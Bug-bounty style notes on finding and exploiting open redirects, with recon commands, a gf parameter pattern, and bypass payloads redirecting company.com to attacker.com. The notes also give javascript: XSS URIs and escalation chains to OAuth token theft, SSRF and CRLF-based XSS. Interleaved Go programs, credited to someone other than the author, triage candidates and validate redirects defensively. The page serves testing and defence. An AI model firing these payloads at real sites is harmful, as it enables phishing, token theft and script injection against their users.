• URL redirect (open redirect) hunting


    https://0x00sec.org/t/open-redirection-guide/21118

    The tools are all written in Go; I'm not good at using them, so I'm leaving this as a placeholder to fill in later.

    Identifying possible vulnerable endpoints:

    • waybackurls + hakrawler + gf

      cat subdomains | waybackurls | tee -a urls
      cat subdomains | hakrawler -depth 3 -plain | tee -a urls
      gf redirect urls

      using redirect.json (a gf profile, stored in the ~/.gf/ directory) with gf:

    {
        "flags" : "-HanrE",
        "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
    }
    
    • Google dorks
      site:domain.com inurl:[PARAMETER] using a parameter list
    • Manual inspection by navigating the webapp and intercepting the requests
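The `gf redirect urls` step above is just `grep -E` over the URL list with the pattern from redirect.json. The following Go program is an added example (not code from the 0x00sec guide or from the blog author) that applies that exact pattern to a constructed, inline stand-in for the `urls` file and additionally parses each match to report which query parameter actually carries one of the listed names. That second step matters for triage: because the gf pattern is an unanchored substring match, `page=` also fires on `homepage=`, so a URL can match the profile while having no parameter that is a realistic redirect candidate. The sample URLs and the `example.com` host are assumptions for the demonstration.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"sort"
	"strings"
)

// redirectPattern is the "pattern" value of the redirect.json gf profile shown above, unchanged.
const redirectPattern = "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="

// redirectRe is what `grep -E` compiles from that pattern: an unanchored substring alternation.
var redirectRe = regexp.MustCompile(redirectPattern)

// paramNames holds the bare parameter names from the pattern ("url=" -> "url"),
// used for exact-name matching of query parameters.
var paramNames = func() map[string]bool {
	m := map[string]bool{}
	for _, alt := range strings.Split(redirectPattern, "|") {
		if strings.HasSuffix(alt, "=") {
			m[strings.TrimSuffix(alt, "=")] = true
		}
	}
	return m
}()

// Candidate is one deduplicated URL that the pattern matched, plus the query
// parameters whose name is exactly one of the listed names (empty when only a
// substring matched, e.g. "homepage=" hitting "page=").
type Candidate struct {
	URL    string
	Params []string
}

// SampleURLs is a constructed stand-in for the `urls` file that waybackurls and hakrawler produce.
var SampleURLs = []string{
	"https://example.com/login?next=/dashboard",
	"https://example.com/search?q=open+redirect",
	"https://example.com/cgi-bin/redirect.cgi?target=https://example.com/",
	"https://example.com/home?homepage=1",
	"https://example.com/auth?redirect_uri=https://example.com/cb&state=abc",
	"https://example.com/login?next=/dashboard", // duplicate, dropped by the dedup step
}

// FilterRedirectCandidates does what `gf redirect urls` does (regex match, one URL per line)
// and additionally parses the query string to name the parameter(s) worth looking at.
func FilterRedirectCandidates(lines []string) []Candidate {
	seen := map[string]bool{}
	var out []Candidate
	for _, line := range lines {
		line = strings.TrimSpace(line)
		if line == "" || seen[line] || !redirectRe.MatchString(line) {
			continue
		}
		seen[line] = true
		c := Candidate{URL: line}
		if u, err := url.Parse(line); err == nil {
			for name := range u.Query() {
				if paramNames[name] {
					c.Params = append(c.Params, name)
				}
			}
			sort.Strings(c.Params) // deterministic order; map iteration is random
		}
		out = append(out, c)
	}
	return out
}

func main() {
	for _, c := range FilterRedirectCandidates(SampleURLs) {
		fmt.Printf("%-75s exact-name params: %v\n", c.URL, c.Params)
	}
}
```

In the sample set, four of the five distinct URLs match the profile, but the `homepage=1` URL matches only through the `page=` substring and yields no exact-name parameter; when reviewing real output, entries with an empty parameter list are the first ones to discard.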

    Confirm and exploit:

    * https://company.com/?redirect=http://attacker.com
    * https://company.com/?redirect=http://company.com.attacker.com
    * https://company.com/?redirect=https://company.com@attacker.com
    * https://company.com/?redirect=//attacker.com
    * https://company.com/?redirect=http://attacker.com#company.com
    * https://company.com/?redirect=http://attacker.com?company.com
    * https://company.com/?redirect=http://attacker.com/company.com
    * https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ
    
    Using special characters:
    ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
    ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
    ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
    ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
    Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
    ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
    ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
    

    Special characters' source

    Escalating to other vulnerabilities:

    Open Redirect + Misconfigured OAuth App => OAuth Token Stealing
    Open Redirect + Filtered SSRF => SSRF
    Open Redirect + CRLFi => XSS
    Open Redirect + javascript URI => XSS
    

    Source

    Escalate to XSS

    • https://company.com/?redirect=javascript:alert(1)
    • https://company.com/?redirect=javascript:prompt(1)
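Every payload in the two lists above (the `company.com` bypass variants, the circled-letter host, and the `javascript:` URIs) targets the same weakness: a redirect filter that reasons about the string instead of the parsed URL. The Go program below is an added example, not code from the 0x00sec guide or from the blog author, that puts those exact payloads (plus one constructed, already-decoded CRLF value for the CRLFi case) through two checks: `NaiveCheck`, the kind of "must mention company.com" filter these payloads are built to slip past, and `IsSafeRedirect`, which parses with `net/url` and accepts only a site-local absolute path or an `https` URL whose host is exactly on an allowlist. The allowlist containing only `company.com`, the decision to reject plain `http://`, and the legitimate targets are assumptions of the example.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// AllowedHosts is the exact set of hosts a redirect may point to (assumption: the app's own host only).
var AllowedHosts = map[string]bool{"company.com": true}

// PagePayloads are the bypass strings from the lists above, plus one constructed value:
// a CRLF injection as the server would see it after URL-decoding %0d%0a.
var PagePayloads = []string{
	"http://attacker.com",
	"http://company.com.attacker.com",
	"https://company.com@attacker.com",
	"//attacker.com",
	"http://attacker.com#company.com",
	"http://attacker.com?company.com",
	"http://attacker.com/company.com",
	"http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ",
	"javascript:alert(1)",
	"javascript:prompt(1)",
	"/login\r\nSet-Cookie: session=constructed", // constructed CRLFi value
}

// LegitTargets are redirect values the application should still accept (assumed for the example).
var LegitTargets = []string{"/dashboard", "https://company.com/settings", "https://COMPANY.com/"}

// NaiveCheck models the filter the payloads are designed to defeat: absolute http(s) URLs
// must contain "company.com", and anything without a scheme is assumed to be a local path.
func NaiveCheck(raw string) bool {
	lower := strings.ToLower(raw)
	if strings.HasPrefix(lower, "http://") || strings.HasPrefix(lower, "https://") {
		return strings.Contains(lower, "company.com")
	}
	return true
}

// IsSafeRedirect accepts only (a) a site-local absolute path or (b) an https URL whose
// host is exactly allow-listed. Everything else, including every payload above, is rejected.
func IsSafeRedirect(raw string, allowed map[string]bool) bool {
	// Control characters and whitespace never belong in a Location value (blocks CRLF injection).
	for _, r := range raw {
		if r < 0x21 || r == 0x7f {
			return false
		}
	}
	u, err := url.Parse(raw)
	if err != nil {
		return false
	}
	switch u.Scheme {
	case "":
		// "//attacker.com" parses into Host; "/\attacker.com" is treated like "//" by browsers.
		if u.Host != "" || u.User != nil || !strings.HasPrefix(raw, "/") {
			return false
		}
		return len(raw) == 1 || (raw[1] != '/' && raw[1] != '\\')
	case "https":
		// Userinfo ("company.com@attacker.com") is rejected outright; the host must match exactly,
		// so "company.com.attacker.com" and look-alike Unicode hosts simply fail the lookup.
		return u.User == nil && allowed[strings.ToLower(u.Hostname())]
	default:
		// http, javascript, data, ...: no other scheme is a valid destination in this design.
		return false
	}
}

// CountNaiveBypasses returns how many payloads the naive filter accepts but the strict one rejects.
func CountNaiveBypasses(payloads []string) int {
	n := 0
	for _, p := range payloads {
		if NaiveCheck(p) && !IsSafeRedirect(p, AllowedHosts) {
			n++
		}
	}
	return n
}

func main() {
	all := append(append([]string{}, PagePayloads...), LegitTargets...)
	for _, p := range all {
		fmt.Printf("naive=%-5v strict=%-5v %q\n", NaiveCheck(p), IsSafeRedirect(p, AllowedHosts), p)
	}
	fmt.Println("payloads that bypass the naive filter:", CountNaiveBypasses(PagePayloads))
}
```

Run as written, nine of the eleven payloads pass `NaiveCheck` (only the bare `http://attacker.com` and the circled-letter host fail it, since neither contains the literal string `company.com`), while `IsSafeRedirect` rejects all eleven and still accepts the three legitimate targets. The design choice worth noting is that the strict check never searches for the trusted host inside the string at all: it either finds no host (a local path) or compares the parsed host for equality, which is why the `@`, `#`, `?`, `/` and subdomain tricks have nothing to exploit.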

    Escalate to XSS using CRLFi

  • Original URL: https://www.cnblogs.com/ahacker15/p/13065571.html